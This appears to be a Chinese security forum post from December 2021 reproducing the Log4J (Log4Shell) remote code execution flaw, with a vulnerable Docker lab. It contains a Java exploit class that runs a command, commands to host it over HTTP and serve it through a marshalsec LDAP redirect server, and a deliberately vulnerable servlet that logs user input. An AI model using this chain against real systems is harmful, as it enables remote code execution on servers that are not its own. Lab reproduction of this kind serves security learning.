[原创] Log4J 漏洞复现+漏洞靶场

发表于: 2021-12-14 16:59 6046

[原创] Log4J 漏洞复现+漏洞靶场

雷石实验室

2021-12-14 16:59

6046

Log4J 漏洞复现+漏洞靶场

前言

昨天晚上朋友圈算是过了年了，一个log4j大伙都忙了起来，看着朋友圈好久没这么热闹了。Apache 的这个log4j这个影响范围的确是大，包括我自己做开发的时候也会用到log4j，这就很尴尬了。

大家也不要在公网上疯狂测试了，我给大家带来了漏洞靶场，攻击视频在下文，一步一步教你。

漏洞原理我改天会详细的写一篇文章出来，今天就主要是复现一下漏洞。

昨晚爆出的log4j rce 是通过lookup触发的漏洞，但jdk1.8.191以上默认不支持ldap协议，对于高版本jdk,则需要一定的依赖。不过为了给大家最简单的说明，我这里还是用jdk1.8.144的版本来运行。

这个漏洞和fastjson的漏洞利用如出一辙，首先需要编写一个恶意类。

public class Exploit {
    public Exploit(){
        try{
            // 要执行的命令
            String[] commands = {"open", "/System/Applications/Calculator.app"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        } catch(Exception e){
            e.printStackTrace();
        }
    }
 
    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}

这里是弹出计算器

把这个类编译之后会得到一个Exploit.class，然后需要在当前目录下启动一个web服务，

1	`python3` `-m http.server` `8100`

然后用marshalsec IDAP服务，项目地址：c28K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6E0j5X3g2U0K9r3I4W2M7W2)9J5c8X3#2S2M7Y4y4Z5j5h3I4K6k6h3x3`.

1	`java` `-cp` `/Users/fengxuan/Downloads/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer` `"2c5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9K6b7e0R3I4x3o6m8Q4x3V1k6Q4x3U0y4q4P5s2m8D9L8$3W2@1"`

漏洞类

package com.evalshell.webstudy;
 
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
 
import java.io.*;
import javax.servlet.ServletException;
import javax.servlet.http.*;
import javax.servlet.annotation.*;
 
 
@WebServlet(name = "helloServlet", value = "/hello-fengxuan")
public class HelloServlet extends HttpServlet {
    private String message;
    private static final Logger logger = LogManager.getLogger(HelloServlet.class);
 
    public void init() {
        message = "Hello World!";
    }
 
    public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
        response.setContentType("text/html");
        response.setHeader("Content-Type", "text/html; charset=utf-8");
        System.out.println(request.getQueryString());
 
 
        // Hello
        PrintWriter out = response.getWriter();
        out.println("<html><body>");
        out.println("<span>你好，兄弟，请用post请求来搞我！</span>");
        out.println("</body></html>");
    }
 
 
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String name = req.getParameter("c");
        System.out.println(name);
        logger.error(name);
        resp.setContentType("text/html");
        resp.setHeader("Content-Type", "text/html; charset=utf-8");
        PrintWriter out = resp.getWriter();
        out.println("<html><body>");
        out.println("<h1>可恶！又被你装到了！</h1>");
        out.println("</body></html>");
    }
 
    public void destroy() {
    }
}

最后运行

视频演戏
ea6K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9K6c8W2)9#2k6W2)9#2k6X3u0A6P5W2)9K6c8p5#2*7d9e0g2y4c8p5f1H3e0h3A6c8x3f1&6c8i4K6y4p5i4K6y4p5i4K6t1$3j5h3#2H3i4K6y4n7L8h3W2V1i4K6y4p5x3U0t1@1y4K6f1I4x3K6p5J5x3q4)9J5y4X3q4E0M7q4)9K6b7X3W2V1P5q4)9K6c8o6q4Q4x3U0k6S2L8i4m8Q4x3@1u0K6L8W2)9K6c8r3t1K6z5o6j5^5y4e0j5J5z5o6l9K6j5K6f1J5x3o6m8S2x3r3c8S2k6U0f1&6j5K6p5$3x3X3b7K6j5X3p5K6i4K6t1$3j5h3#2H3i4K6y4n7j5$3S2C8M7$3#2Q4x3@1c8W2j5K6t1$3z5e0g2T1z5r3c8T1y4e0p5I4j5$3q4W2y4e0x3&6y4o6b7H3y4$3c8T1k6U0f1I4k6X3t1I4k6U0b7@1y4e0u0T1j5e0R3H3y4X3x3H3k6h3p5@1k6e0V1J5x3e0l9K6x3h3b7J5z5e0x3@1k6U0t1%4x3e0l9&6y4o6c8X3x3$3f1&6y4e0q4X3j5K6k6X3i4K6t1$3j5h3#2H3i4K6y4n7N6r3!0C8k6h3&6Q4x3@1b7I4x3e0t1I4z5e0f1%4x3K6l9$3i4K6t1$3j5h3#2H3i4K6y4n7L8r3q4F1k6#2)9K6c8s2A6Z5i4K6g2X3b7@1&6Q4x3U0y4J5k6l9`.`.

漏洞靶场

为了互联网的安全，也为了给大家学习的环境，有很多同学不知道如何复现，我搭建了一个漏洞靶场，我编写的docker-compose.yml

地址是：6b0K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6X3k6h3&6Y4P5s2g2S2L8X3N6A6N6q4)9J5c8X3I4G2k6K6c8B7i4K6g2X3N6Y4g2D9L8R3`.`.

或者直接运行命令

docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln 
docker exec -it log4j_vuln_container /bin/bash
/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh

然后访问你的8080的端口, 访问 2a9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9K6b7e0R3H3z5o6m8Q4x3V1k6%4k6h3u0K6N6s2g2V1P5g2)9J5c8R3`.`. 就可以了

按照视频教程玩就行。你的靶场你自己随便玩！

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

收藏・5

免费・0

支持

最新回复 (1)
陈咬金雪币： 0 活跃值： (21) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	陈咬金 2 楼看雪的老铁，看Log4j2 Jndi漏洞原理解析、复盘可以直接先看这个： c2bK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8Y4N6t1g2i4k6Q4x3X3c8D9c8W2S2n7g2h3y4b7M7o6m8#2d9h3A6$3d9q4y4S2N6H3`.`. 2021-12-14 18:34 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

雷石实验室

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (1)
陈咬金雪币： 0 活跃值： (21) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	陈咬金 2 楼看雪的老铁，看Log4j2 Jndi漏洞原理解析、复盘可以直接先看这个： c2bK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8Y4N6t1g2i4k6Q4x3X3c8D9c8W2S2n7g2h3y4b7M7o6m8#2d9h3A6$3d9q4y4S2N6H3`.`. 2021-12-14 18:34 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复